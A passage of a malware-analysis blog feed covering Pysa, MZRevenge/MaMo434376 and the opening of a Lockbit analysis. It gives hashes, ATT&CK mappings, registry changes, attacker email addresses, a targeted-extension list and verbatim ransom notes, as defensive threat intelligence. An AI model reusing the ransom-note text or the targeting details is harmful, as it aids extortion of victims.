<span class="mi">4</span><span class="n">nVtL</span><span class="o">+</span><span class="n">sCARE</span><span class="o">===</span>
</pre></div>
<p><br></p>
<p>The Ransomnote contents stayed the same, exept for the contact email addresses. Here are the contents of Readme.README: </p>
<div class="highlight"><pre><span></span><span class="nv">Hi</span> <span class="nv">Company</span>,
<span class="nv">Every</span> <span class="nv">byte</span> <span class="nv">on</span> <span class="nv">any</span> <span class="nv">types</span> <span class="nv">of</span> <span class="nv">your</span> <span class="nv">devices</span> <span class="nv">was</span> <span class="nv">encrypted</span>.
<span class="nv">Don</span><span class="s1">'</span><span class="s">t try to use backups because it were encrypted too.</span>
<span class="nv">To</span> <span class="nv">get</span> <span class="nv">all</span> <span class="nv">your</span> <span class="nv">data</span> <span class="nv">back</span> <span class="nv">contact</span> <span class="nv">us</span>:
<span class="nv">raingemaximo</span>@<span class="nv">protonmail</span>.<span class="nv">com</span>
<span class="nv">gareth</span>.<span class="nv">mckie3l</span>@<span class="nv">protonmail</span>.<span class="nv">com</span>
<span class="o">--------------</span>
<span class="nv">FAQ</span>:
<span class="mi">1</span>.
<span class="nv">Q</span>: <span class="nv">How</span> <span class="nv">can</span> <span class="nv">I</span> <span class="nv">make</span> <span class="nv">sure</span> <span class="nv">you</span> <span class="nv">don</span><span class="s1">'</span><span class="s">t fooling me?</span>
<span class="nv">A</span>: <span class="nv">You</span> <span class="nv">can</span> <span class="k">send</span> <span class="nv">us</span> <span class="mi">2</span> <span class="nv">files</span><span class="ss">(</span><span class="nv">max</span> <span class="mi">2</span><span class="nv">mb</span><span class="ss">)</span>.
<span class="mi">2</span>.
<span class="nv">Q</span>: <span class="nv">What</span> <span class="nv">to</span> <span class="k">do</span> <span class="nv">to</span> <span class="nv">get</span> <span class="nv">all</span> <span class="nv">data</span> <span class="nv">back</span>?
<span class="nv">A</span>: <span class="nv">Don</span><span class="s1">'</span><span class="s">t restart the computer, don</span><span class="s1">'</span><span class="nv">t</span> <span class="nv">move</span> <span class="nv">files</span> <span class="nv">and</span> <span class="nv">write</span> <span class="nv">us</span>.
<span class="mi">3</span>.
<span class="nv">Q</span>: <span class="nv">What</span> <span class="nv">to</span> <span class="nv">tell</span> <span class="nv">my</span> <span class="nv">boss</span>?
<span class="nv">A</span>: <span class="nv">Protect</span> <span class="nv">Your</span> <span class="nv">System</span> <span class="nv">Amigo</span>.
</pre></div>
<p></br></p>
<h2><strong>MITRE ATT&CK</strong></h2>
<p><em>T1215</em> --> Kernel Modules and Extensions --> Persistence</p>
<p><em>T1045</em> --> Software Packing --> Defense Evasion</p>
<p><em>T1012</em> --> Query Registry --> Discovery</p>
<p><em>T1114</em> --> Email Collection --> Collection</p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>Mespinoza (pysa)</h3>
<div class="highlight"><pre><span></span><span class="mi">1</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: a18c85399cd1ec3f1ec85cd66ff2e97a0dcf7ccb17ecf697a5376da8eda4d327</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">12288</span><span class="p">:</span><span class="n">aVchT6oi</span><span class="o">+</span><span class="n">OeO</span><span class="o">+</span><span class="n">OeNhBBhhBBpiOTn5CjGGc4dXOsOjKf</span><span class="p">:</span><span class="n">aVc1Jiin5yGpMIj</span>
<span class="n">File</span> <span class="k">size</span><span class="p">:</span> <span class="mi">504</span><span class="p">.</span><span class="mi">50</span> <span class="n">KB</span>
</pre></div>
<h3>Associated Files</h3>
<div class="highlight"><pre><span></span><span class="n">Readme</span><span class="p">.</span><span class="n">README</span>
<span class="nf">%temp</span><span class="o">%</span><span class="err">\</span><span class="n">update</span><span class="p">.</span><span class="n">bat</span>
</pre></div>
<h3>E-Mail Addresses</h3>
<div class="highlight"><pre><span></span><span class="n">aireyeric</span><span class="nv">@protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">ellershaw</span><span class="p">.</span><span class="n">kiley</span><span class="nv">@protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">Used</span><span class="w"> </span><span class="ow">in</span><span class="w"> </span><span class="n">previous</span><span class="w"> </span><span class="nl">campaigns</span><span class="p">:</span><span class="w"></span>
<span class="n">mespinoza980</span><span class="nv">@protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">alanson_street8</span><span class="nv">@protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">lambchristoffer</span><span class="nv">@protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
</pre></div>
<h3>Ransomnote</h3>
<div class="highlight"><pre><span></span><span class="nv">Hi</span> <span class="nv">Company</span>,
<span class="nv">Every</span> <span class="nv">byte</span> <span class="nv">on</span> <span class="nv">any</span> <span class="nv">types</span> <span class="nv">of</span> <span class="nv">your</span> <span class="nv">devices</span> <span class="nv">was</span> <span class="nv">encrypted</span>.
<span class="nv">Don</span><span class="s1">'</span><span class="s">t try to use backups because it were encrypted too.</span>
<span class="nv">To</span> <span class="nv">get</span> <span class="nv">all</span> <span class="nv">your</span> <span class="nv">data</span> <span class="nv">back</span> <span class="nv">contact</span> <span class="nv">us</span>:
<span class="nv">aireyeric</span>@<span class="nv">protonmail</span>.<span class="nv">com</span>
<span class="nv">ellershaw</span>.<span class="nv">kiley</span>@<span class="nv">protonmail</span>.<span class="nv">com</span>
<span class="o">--------------</span>
<span class="nv">FAQ</span>:
<span class="mi">1</span>.
<span class="nv">Q</span>: <span class="nv">How</span> <span class="nv">can</span> <span class="nv">I</span> <span class="nv">make</span> <span class="nv">sure</span> <span class="nv">you</span> <span class="nv">don</span><span class="s1">'</span><span class="s">t fooling me?</span>
<span class="nv">A</span>: <span class="nv">You</span> <span class="nv">can</span> <span class="k">send</span> <span class="nv">us</span> <span class="mi">2</span> <span class="nv">files</span><span class="ss">(</span><span class="nv">max</span> <span class="mi">2</span><span class="nv">mb</span><span class="ss">)</span>.
<span class="mi">2</span>.
<span class="nv">Q</span>: <span class="nv">What</span> <span class="nv">to</span> <span class="k">do</span> <span class="nv">to</span> <span class="nv">get</span> <span class="nv">all</span> <span class="nv">data</span> <span class="nv">back</span>?
<span class="nv">A</span>: <span class="nv">Don</span><span class="s1">'</span><span class="s">t restart the computer, don</span><span class="s1">'</span><span class="nv">t</span> <span class="nv">move</span> <span class="nv">files</span> <span class="nv">and</span> <span class="nv">write</span> <span class="nv">us</span>.
<span class="mi">3</span>.
<span class="nv">Q</span>: <span class="nv">What</span> <span class="nv">to</span> <span class="nv">tell</span> <span class="nv">my</span> <span class="nv">boss</span>?
<span class="nv">A</span>: <span class="nv">Protect</span> <span class="nv">Your</span> <span class="nv">System</span> <span class="nv">Amigo</span>.
</pre></div>
<p></br></p>A "Project.exe" that should have stayed in a drawer - MZRevenge / MaMo4343762019-12-11T00:00:00+01:002019-12-11T00:00:00+01:00f0wLtag:dissectingmalwa.re,2019-12-11:/a-projectexe-that-should-have-stayed-in-a-drawer-mzrevenge-mamo434376.html<p>I first read about this strain on Twitter but it didn't seem like a big thing. Turns out I Was wrong: In the last 3 days I collected over 35 samples :O</p><p><center><img alt="Header Image" src="https://dissectingmalwa.re/img/project-header.png"></center></p>
<p></br></p>
<p>Searching for "Project.exe" on AnyRun yields more than a healthy list of results all matching this strain.</p>
<p><center><img alt="Samples" src="https://dissectingmalwa.re/img/project-samples.png"></center></p>
<p></br></p>
<p>Oh would you look at that: Looks like we have a Borland Delphi application here π§</p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/project-die.png"></center></p>
<p></br></p>
<p>Yep, it's that ugly it definitely is Deplhi :D And the criminals seem to have a very strong opinion about the Land of the Free but no arguments to back it up (since the rest of the form is empty).</p>
<p><center><img alt="Murica" src="https://dissectingmalwa.re/img/project-america.png"></center></p>
<p></br></p>
<p>The other strain uses a similar Form Window but actually displays its name in there (but they saved on the Window Title).</p>
<p><center><img alt="Mamo" src="https://dissectingmalwa.re/img/project-mamo.png"></center></p>
<p></br></p>
<p>MZ Revenge and MaMo add these extensions to encrypted files respectively: <em>.MZ173801</em> and <em>.MaMo434376</em>. It seems to drop the Ransomnotes into the Library Folders, once into %appdata%\Microsoft\Windows\Recent and into the root of every (unmounted) storage device.</p>
<p><center><img alt="Ransomnotes" src="https://dissectingmalwa.re/img/project-ransomnotes.png"></center></p>
<p></br></p>
<p>TIL: The <em>MZP</em> Magic tells you that the PE was built in Pascal. Therefore the error message is different as well, normally you would expect to see <strong>This program cannot be run in DOS mode</strong> here. </p>
<p><center><img alt="MZ Header" src="https://dissectingmalwa.re/img/project-mz.png"></center></p>
<p></br></p>
<p>Because loading a Delphi executable into IDA or Ghidra can be very painful to look at I'll try out a tool I haven't used before. It is called "Interactive Delphi Reconstructor" (IDR in short) and the setup is trivial. Just clone the Git Repository and download the Knowledge Base files linked at the bottom and extract + paste them into the source folder.</p>
<p></br></p>
<p><center><div class="github-card" data-github="crypto2011/IDR" data-width="400" data-height="150" data-theme="default"></div>
<script src="//cdn.jsdelivr.net/github-cards/latest/widget.js"></script></center></p>
<p>For those playing along at home it should look something like this after the auto-analysis finished:</p>
<p><center><img alt="IDR in action" src="https://dissectingmalwa.re/img/project-idr.png"></center></p>
<p></br></p>
<p>Looking at the Strings tab I noticed this weird GUID <em>{43826d1e-e718-42ee-bc55-a1e261c37bfe}</em>. I'll have to investigate further to say for sure, but looking at this Document for the <a href="https://wikileaks.org/ciav7p1/cms/page_3375231.html">CIA Vault7 Leaks</a> this might be part of an UAC bypass.</p>
<p>I also grabbed the extension list the ransomware uses. It will target the following extensions:</p>
<div class="highlight"><pre><span></span><span class="na">.txt</span><span class="c">;.doc;.docx;.intex;.pdf;.zip;.rar;.onetoc;.css;.lnk;.xlsx;.ppt;.pptx;.odt;.jpg;.bmp;.ods;.png;.csv;.sql;.mdb;.sln;.php;.asp;.aspx;.odp;.html;.xml;.psd;.bk;.bat;.mp3;.mp4;.wav;.mdf;.ost;.wma;.avi;.divx;.mkv;.mpeg;.wmv;.mov;.ogg;.mid;.gif;.jpeg;.cs;.vb;.vbproj;.py;.asmx;.json;.mov;.jpe;.dib;.h;.cpp;.ico;.suo;.c;.vcxproj;.mml;.otp;.VDPROJ;.vcxitems;.py3;.pyc;.pyde;.resx;.pdb;.msg;.manifest;.settings;.dat;.jar;.ps1;.htm;.f3d;.myd;.dwg;.rtf;.apk;.iso;.7-zip;.ace;.arj;.bz2;.myi;.cab;.gzip;.lzh;.tar;.uue;.xz;.z;.001;.mpg;.odg;.core;.crproj;.pas;.db;.torrent;.csptoj;.config;.nef;.bin;.enigma;.log;.ovpn;.rc;.url;.csh;.cvproj;.odb;.dproj;.cfg;.csm;.7z;.3dm;.3ds;.3g2;.3gp;.602;.ost;.123;.ARC;.PAQ;.accdb;.aes;.ai;.asc;.asf;.backup;.bak;.brd;.cgm;.class;.cmd;.crt;.csr;.dbf;.dch;.otg;.der;.dif;.dip;.djvu;.docb;.docm;.dot;.dot;.dotm;.dotx;.dwg;.edb;.eml;.fla;.flv;.frm;.gpg;.gz;.hwp;.ibd;.java;.js;.sp;.key;.lay;.lay6;.ldf;.m3u;.m4u;.max;.ott;.p12;.pem;.pfx;.pl;.pot;.potm;.potx;.ppam;.pps;.ppsm;.ppsx;.pptm;.pst;.raw;.rb;.sch;.sh;.sldm;.sldx;.slk;.snt;.sqlite3;.sqlitedb;.stc;.std;.sti;.stw;.svg;.swf;.sxc;.sxd;.sxi;.sxm;.sxw;.tbk;.tgz;.tif;.tiff;.uop;.uot;.vbs;.vcd;.vdi;.vmdk;.vbe;.vmx;.vob;.vsd;.vsdx;.wb2;.wk1;.wks;.xlc;.xlm;.xlsb;.xlsm;.xlt;.xltm;.xltx;.xlw;.mkv;.img;.vbox</span>
</pre></div>
<p></br></p>
<p>As suspected by @Hildakrypt on Twitter the creators of the turkish KesLan Ransomware might also have built MZ Revenge / MaMo.</p>
<p></br></p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr">The <a href="https://twitter.com/hashtag/KesLan?src=hash&ref_src=twsrc%5Etfw">#KesLan</a> and <a href="https://twitter.com/hashtag/MZREVENGE?src=hash&ref_src=twsrc%5Etfw">#MZREVENGE</a> <a href="https://twitter.com/hashtag/Ransomware?src=hash&ref_src=twsrc%5Etfw">#Ransomware</a> authors are the same person, the canonical name is <a href="https://twitter.com/hashtag/MaMo434376?src=hash&ref_src=twsrc%5Etfw">#MaMo434376</a> (as refered in the code) cc <a href="https://twitter.com/BleepinComputer?ref_src=twsrc%5Etfw">@BleepinComputer</a> <a href="https://twitter.com/demonslay335?ref_src=twsrc%5Etfw">@demonslay335</a> <a href="https://twitter.com/GrujaRS?ref_src=twsrc%5Etfw">@GrujaRS</a> <a href="https://twitter.com/raby_mr?ref_src=twsrc%5Etfw">@raby_mr</a> <a href="https://twitter.com/Amigo_A_?ref_src=twsrc%5Etfw">@Amigo_A_</a> <a href="https://t.co/HQCuTWgJoH">pic.twitter.com/HQCuTWgJoH</a></p>— HILDACRYPT (@HILDAKRYPT) <a href="https://twitter.com/HILDAKRYPT/status/1204783762267082757?ref_src=twsrc%5Etfw">December 11, 2019</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></center></p>
<p></br></p>
<p><strong>Update 15.12.2019:</strong></p>
<p>A new Version of this strain was found to be appending <em>.aes</em> to encrypted files. This time there is no ransomnote though, so let's see if this is a malfunction or intentional.</p>
<p>The Any.Run Analysis can be found <a href="https://app.any.run/tasks/ee090f98-3499-4075-9e3c-e71479092621/">here</a>.</p>
<p>Visually this sample resembles the look of the "MZ Revenge 1.0" strain with an empty Form and the red DX icon.</p>
<p><center><img alt="AES empty form" src="https://dissectingmalwa.re/img/project-form2.png"></center></p>
<p></br></p>
<h2><strong>MITRE ATT&CK</strong></h2>
<p><em>T1215</em> --> Kernel Modules and Extensions --> Persistence</p>
<p><em>T1045</em> --> Software Packing --> Defense Evasion</p>
<p><em>T1056</em> --> Input Capture --> Credential Access</p>
<p><em>T1012</em> --> Query Registry --> Discovery</p>
<p><em>T1124</em> --> System Time Discovery --> Discovery</p>
<p><em>T1083</em> --> File and Directory Discovery --> Discovery</p>
<p><em>T1076</em> --> Remote Desktop Protocol --> Lateral Movement</p>
<p><em>T1056</em> --> Input Capture --> Collection</p>
<p><em>T1115</em> --> Clipboard Data --> Collection</p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>MZRevenge / MaMo434376</h3>
<div class="highlight"><pre><span></span><span class="ss">"MZ Revenge 1.0"</span><span class="p">:</span>
<span class="mi">7</span><span class="n">a92a80e742dbcb0d30948dbf6c4d7a6236a5692c5864a1276cfc84d5c71e375</span>
<span class="mi">00</span><span class="n">c84efdebc555191ec91999a7f85c4ab0a6e7236dc477c7e4eb487152211336</span>
<span class="n">a90c73a86a2771f6bff2cfc34d5798b71603da49105342a0a00324b7b6c63018</span>
<span class="mi">6907</span><span class="n">a7689375a06c4f3d5c9d99074c9242342c0e813e669a03a07899740dcfa8</span>
<span class="n">f9cb03dbec628694f81c015b6799e3305f4941dab95d6f67343ef2c2dd2fb891</span>
<span class="mi">734</span><span class="n">a6461eed16f83a355d22ecea28c993ef350a9ea925e2a68caea404f1c0a42</span>
<span class="n">be880ab3f9b4f9cd967fdca899446241e962b3de8c938ed58b69d419b1b6168a</span>
<span class="mi">62</span><span class="n">b129f041cb6b3ebf16f084295f6ffb818db67254eaadeadc906e3d2aecc415</span>
<span class="mi">75</span><span class="n">b6e08e9a0ec989d4936dbbca7dc4ae5cf05ee0f4a7bc4ebccbf5bc81ac9518</span>
<span class="mi">32</span><span class="n">c666ae39cced01978d43a878b4708cb4f4e7051c6d22f9a11c35ce6176151d</span>
<span class="mi">184</span><span class="n">a63ae5c09e4963fc915f9957302ec5b0bd52b2e86049f45a75613f8d9f552</span>
<span class="mi">00144748</span><span class="n">f68a6fe3a7cd98539043698a49fd1e020a6465d5f6e07542712ec014</span>
<span class="n">d8cff0354008b6fd2ea362d33609099eaedc13c5c7c759e2ad9ad998e0b00cda</span>
<span class="mi">56</span><span class="n">ee5c88648365f5269e1ab0d6b00634f7d9fd9f08c91a45c7cb601d5073feb4</span>
<span class="mi">3</span><span class="n">e0c4925102b2b4f1d93193000907c30731163b0e756d37c2a3b4dda1f938794</span>
<span class="n">ca15b28914dc22461fbf8f213047673de7a0434d7ca0d8b796c1a6038f169e23</span>
<span class="mi">265</span><span class="n">e0746692b5301156e4bbd19a9aa62961e333f04fc26d71a64f7739705ee7b</span>
<span class="n">a90c73a86a2771f6bff2cfc34d5798b71603da49105342a0a00324b7b6c63018</span>
<span class="mi">859</span><span class="n">c4b2306ea6a20fdbc4cdbdb28aa500e9928e57ae2ba13fbfb729cc465b6b0</span>
<span class="n">ec70974046fbbd1461ef4b181f8a08270ffaede196c02f1e25e6c7807c29db6a</span>
<span class="mi">45</span><span class="n">d7884b61a6b38356ee18b3814fae0e88715ac004e9df4417d47522203e2a89</span>
<span class="mi">648</span><span class="n">cec145362a52c89c155bf5034eaedee9dd8c90e458dd8c0e1a25ad96e577e</span>
<span class="mi">13</span><span class="n">bcd9a3c09560357b1decc640971f2cc8c1ac58275c317c4266751aefafd29b</span>
<span class="n">d95bd4077537edd5922861977ab3be873532ff2717b0dba916abc9465481cb0e</span>
<span class="n">b02ee036ac32a3b7425a57ff1cf68f2fc46a5f2d7bdea6be78efd574f9761c53</span>
<span class="mi">9</span><span class="n">f28d3d3b8f6078c98d5831a3f1996c28fc14209f2240cc87bf70d20ffac371f</span>
<span class="mi">1</span><span class="n">d5a8d924766f8aba0839ca747b0076b8b3718544c43e9ed32afd33f7fdd3c73</span>
<span class="mi">4</span><span class="n">af2825b70fa4006d56a1faf40062e4a614dfa3de79a197bc268cd708709d4ec</span>
<span class="mi">3</span><span class="n">f35a62f5e2fcb8f74d3aecae7de4bd9834c9400d33a716b74bbe28cf156f142</span>
<span class="mi">0</span><span class="n">b7974582bb4e9c7de0c04618f307e7cbb4bba644c99f165be54117abeb32d43</span>
<span class="mi">91</span><span class="n">d490cabd6776df1bcf26fa17cf9a13663bd79c1b5087ea718248f602d8df0e</span>
<span class="ss">"MaMo434376"</span><span class="p">:</span>
<span class="mi">3276</span><span class="n">ab52336b9bc944717cfee706301326addf339891092fb0697d7b93960fa4</span>
<span class="mi">10</span><span class="n">e37630cb1d050911f0c6c094d9c8218622887695960e35f98a596a2ed4de8d</span>
<span class="n">bbfa50b69c3ce9274f8c207dc6eb9caee6e55481440dfde23b85e9aa891ae53d</span>
<span class="mi">02101</span><span class="n">d26f1ac2b3a9188489e4d2f4eeef648916c6a346d3318c36c2622754cbc</span>
<span class="n">bbb26303554c109d62b6f340045c04083ce04d5b6d94ac3a221223187a977072</span>
<span class="n">d7d908991970c971bcc0239654e437c22a987160422c70a838a016c5770caa72</span>
<span class="k">Version</span> <span class="mi">2</span><span class="p">:</span>
<span class="mi">70733389</span><span class="n">c89b4358f04575226a8ce60c4511018c98731a2ff7f556c29447e4a4</span>
</pre></div>
<h3>Registry Keys</h3>
<div class="highlight"><pre><span></span><span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">Software</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">CurrentVersion</span><span class="err">\</span><span class="n">Policies</span><span class="err">\</span><span class="k">System</span>
<span class="c1">--> DisableTaskMgr = 1</span>
<span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">Software</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">CurrentVersion</span><span class="err">\</span><span class="n">Internet</span> <span class="n">Settings</span><span class="err">\</span><span class="n">ZoneMap</span>
<span class="c1">--> UNCAsIntranet = 0</span>
</pre></div>
<h3>E-Mail Addresses</h3>
<div class="highlight"><pre><span></span><span class="n">helpdesk_mz</span><span class="nv">@aol</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
</pre></div>
<h3>Ransomnote V1</h3>
<div class="highlight"><pre><span></span><span class="nv">ATTENTION</span><span class="o">!</span>
<span class="nv">Don</span><span class="o">*</span><span class="nv">t</span> <span class="nv">worry</span>, <span class="nv">you</span> <span class="nv">can</span> <span class="k">return</span> <span class="nv">all</span> <span class="nv">your</span> <span class="nv">files</span><span class="o">!</span>
<span class="nv">All</span> <span class="nv">your</span> <span class="nv">files</span> <span class="nv">like</span> <span class="nv">photos</span>, <span class="nv">databases</span>, <span class="nv">documents</span> <span class="nv">and</span> <span class="nv">other</span> <span class="nv">important</span> <span class="nv">are</span> <span class="nv">encrypted</span> <span class="nv">with</span> <span class="nv">strongest</span> <span class="nv">encryption</span> <span class="nv">and</span> <span class="nv">unique</span> <span class="nv">key</span>.
<span class="nv">The</span> <span class="nv">only</span> <span class="nv">method</span> <span class="nv">of</span> <span class="nv">recovering</span> <span class="nv">files</span> <span class="nv">is</span> <span class="nv">to</span> <span class="nv">purchase</span> <span class="nv">decrypt</span> <span class="nv">tool</span> <span class="nv">and</span> <span class="nv">unique</span> <span class="nv">key</span> <span class="k">for</span> <span class="nv">you</span>.
<span class="nv">This</span> <span class="nv">software</span> <span class="nv">will</span> <span class="nv">decrypt</span> <span class="nv">all</span> <span class="nv">your</span> <span class="nv">encrypted</span> <span class="nv">files</span>.
<span class="nv">What</span> <span class="nv">guarantees</span> <span class="nv">you</span> <span class="nv">have</span>?
<span class="nv">You</span> <span class="nv">can</span> <span class="k">send</span> <span class="nv">one</span> <span class="nv">of</span> <span class="nv">your</span> <span class="nv">encrypted</span> <span class="nv">file</span> <span class="nv">from</span> <span class="nv">your</span> <span class="nv">PC</span> <span class="nv">and</span> <span class="nv">we</span> <span class="nv">decrypt</span> <span class="nv">it</span> <span class="k">for</span> <span class="nv">free</span>.
<span class="nv">But</span> <span class="nv">we</span> <span class="nv">can</span> <span class="nv">decrypt</span> <span class="nv">only</span> <span class="mi">1</span> <span class="nv">file</span> <span class="k">for</span> <span class="nv">free</span>. <span class="nv">File</span> <span class="nv">must</span> <span class="nv">not</span> <span class="nv">contain</span> <span class="nv">valuable</span> <span class="nv">information</span>.
<span class="nv">Price</span> <span class="nv">of</span> <span class="nv">private</span> <span class="nv">key</span> <span class="nv">and</span> <span class="nv">decrypt</span> <span class="nv">software</span> <span class="nv">is</span> <span class="mh">$300</span>.
<span class="nv">Discount</span> <span class="mi">50</span><span class="o">%</span> <span class="nv">available</span> <span class="k">if</span> <span class="nv">you</span> <span class="nv">contact</span> <span class="nv">us</span> <span class="nv">first</span> <span class="mi">72</span> <span class="nv">hours</span>, <span class="nv">thats</span> <span class="nv">price</span> <span class="k">for</span> <span class="nv">you</span> <span class="nv">is</span> <span class="mh">$150</span>.
<span class="nv">Please</span> <span class="nv">note</span> <span class="nv">that</span> <span class="nv">you</span><span class="o">*</span><span class="nv">ll</span> <span class="nv">never</span> <span class="nv">restore</span> <span class="nv">your</span> <span class="nv">data</span> <span class="nv">without</span> <span class="nv">payment</span>.
<span class="nv">Check</span> <span class="nv">your</span> <span class="nv">e</span><span class="o">-</span><span class="nv">mail</span> <span class="s2">"</span><span class="s">Spam</span><span class="s2">"</span> <span class="nv">or</span> <span class="s2">"</span><span class="s">Junk</span><span class="s2">"</span> <span class="nv">folder</span> <span class="k">if</span> <span class="nv">you</span> <span class="nv">don</span><span class="o">*</span><span class="nv">t</span> <span class="nv">get</span> <span class="nv">answer</span> <span class="nv">more</span> <span class="nv">than</span> <span class="mi">6</span> <span class="nv">hours</span>.
<span class="nv">e</span><span class="o">-</span><span class="nv">mail</span> <span class="nv">address</span> <span class="nv">to</span> <span class="k">send</span> <span class="nv">your</span> <span class="nv">file</span> <span class="nv">and</span> <span class="nv">To</span> <span class="nv">get</span> <span class="nv">this</span> <span class="nv">software</span> <span class="nv">you</span> <span class="nv">need</span> <span class="nv">write</span> <span class="nv">on</span> <span class="nv">my</span> <span class="nv">e</span><span class="o">-</span><span class="nv">mail</span>:
<span class="nv">helpdesk_mz</span>@<span class="nv">aol</span>.<span class="nv">com</span>
<span class="nv">Your</span> <span class="nv">Decryption</span> <span class="nv">Key</span> <span class="ss">(</span><span class="k">DO</span> <span class="nv">NOT</span> <span class="nv">WIPE</span> <span class="nv">OR</span> <span class="nv">CHANGE</span> <span class="nv">THIS</span> <span class="nv">SWITCH</span><span class="o">!</span><span class="ss">)</span> :
[<span class="nv">redacted</span>]
</pre></div>
<h3>Ransomnote V2</h3>
<div class="highlight"><pre><span></span><span class="o">---></span> <span class="nv">MZ</span> <span class="nv">REVENGE</span> <span class="mi">1</span>.<span class="mi">0</span> <span class="o"><---</span>
<span class="nv">Dont</span> <span class="nv">worry</span>, <span class="nv">some</span> <span class="nv">of</span> <span class="nv">your</span> <span class="nv">files</span> <span class="nv">have</span> <span class="nv">extension</span> .<span class="nv">MZ173801</span> <span class="nv">and</span> <span class="nv">they</span> <span class="nv">are</span> <span class="nv">encrypted</span>.
<span class="nv">In</span> <span class="nv">confirmatiom</span>, <span class="nv">that</span> <span class="nv">we</span> <span class="nv">have</span> <span class="nv">private</span> <span class="nv">decryption</span> <span class="nv">key</span>,
<span class="nv">We</span> <span class="nv">can</span> <span class="nv">provide</span> <span class="nv">test</span> <span class="nv">decryption</span> <span class="k">for</span> <span class="mi">1</span> <span class="nv">file</span> <span class="ss">(</span><span class="nv">png</span>,<span class="nv">jpg</span>,<span class="nv">bmp</span>,<span class="nv">gif</span><span class="ss">)</span>.
<span class="nv">Its</span> <span class="nv">a</span> <span class="nv">business</span>, <span class="k">if</span> <span class="nv">we</span> <span class="nv">cant</span> <span class="nv">provide</span> <span class="nv">full</span> <span class="nv">decryption</span>, <span class="nv">other</span> <span class="nv">people</span> <span class="nv">wont</span> <span class="nv">trust</span> <span class="nv">us</span>.
<span class="nv">There</span> <span class="nv">is</span> <span class="nv">no</span> <span class="nv">way</span> <span class="nv">to</span> <span class="nv">decrypt</span> <span class="nv">your</span> <span class="nv">files</span> <span class="nv">without</span> <span class="nv">our</span> <span class="nv">help</span>.
<span class="nv">Dont</span> <span class="nv">trust</span> <span class="nv">anyone</span>. <span class="nv">Even</span> <span class="nv">your</span> <span class="nv">cat</span>.
<span class="nv">Main</span> <span class="nv">mail</span>: <span class="nv">helpdesk_mz</span>@<span class="nv">aol</span>.<span class="nv">com</span>
<span class="nv">Dont</span> <span class="nv">change</span> <span class="nv">decryption</span> <span class="nv">key</span> <span class="nv">below</span><span class="o">!!!</span>
<span class="nv">MZ</span> <span class="nv">DECRYPTION</span> <span class="nv">KEY</span>:
[<span class="nv">redacted</span>]
</pre></div>
<p></br></p>A B C, easy as ΠΎΠ΄ΠΈΠ½, Π΄Π²Π°, ΡΡΠΈ - Lockbit (ABCD) Ransomware2019-12-05T00:00:00+01:002019-12-05T00:00:00+01:00f0wLtag:dissectingmalwa.re,2019-12-05:/a-b-c-easy-as-odin-dva-tri-lockbit-abcd-ransomware.html<p>Let's continue with the obscure music -> malware references by analysing Lockbit, a strain that has been around for a few weeks, but with very little Info about is origin and behaviour.</p><p>I got this sample from one of the victims posting in the <a href="https://www.bleepingcomputer.com/forums/t/706361/abcd-ransomware-abcd-restore-my-filestxt">Bleeping Computer</a> Forum thread. From what I gather their systems fell to yet another RDP Bruteforce attack (one user was affected on multiple systems in their domain).</p>
<p><center><img alt="Logo" src="https://dissectingmalwa.re/img/abcd-header.png"></center></p>
<h4><em>A general disclaimer as always: downloading and running the samples linked below will lead to the encryption of your personal data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<p>ABCD @ <a href="https://app.any.run/tasks/192293c2-3d05-4874-85ae-ce006c3d68db">AnyRun</a> | <a href="https://www.virustotal.com/gui/file/70cb1a8cb4259b72b704e81349c2ad5ac60cd1254a810ef68757f8c9409e3ea6/detection">VirusTotal</a> | <a href="https://www.hybrid-analysis.com/sample/70cb1a8cb4259b72b704e81349c2ad5ac60cd1254a810ef68757f8c9409e3ea6/5de68fd5147c6120bb7d5d0c">HybridAnalysis</a>
--> <code>sha256 3c9f777654a45eb6219f12c2ad10082043814389a4504c27e5aec752a8ee4ded</code></p>
<p>Sadly no .NET this time around, but an uncommonly recent Version of Visual Studio was used to compile this binary.</p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/abcd-die.png"></center></p>
<p></br></p>
<p>Entropy-wise it looks very "clean" as well, no stray sections or big spikes in the graph. It might not even be obfuscated π€.</p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/abcd-entropy.png"></center></p>
<p></br></p>
<p>Opening an encrypted file provided by a victim I can't spot a filemarker or other identifying artifacts anywhere. Most Crimeware Devs don't tamper with the orginal files to keep the code complexity at a minimum, since the biggest portion of criminals are far from being skilled programmers.</p>
<p><center><img alt="Opening an encrypted file in the Hexeditor" src="https://dissectingmalwa.re/img/abcd-filehex.png"></center></p>
<p></br></p>
<p>Opening up IDA this Graph is one of the first things I saw after the auto-analysis finished. Looks kinda complicated, so let's see what this sample has got in store for us.</p>
<p><center><img alt="Weird Structure" src="https://dissectingmalwa.re/img/abcd-structure.png"></center></p>
<p></br></p>
<p>The Ransomware useses FindNextFileW to look for files to encrypt. Since this function is likely to cause errors if implemented incorrectly they built themselves some kind of workaround. Everytime the function call fails they will write to the Log with the message below.</p>
<p><center><img alt="FindFiles Function" src="https://dissectingmalwa.re/img/abcd-findfiles.png"></center></p>
<p></br></p>
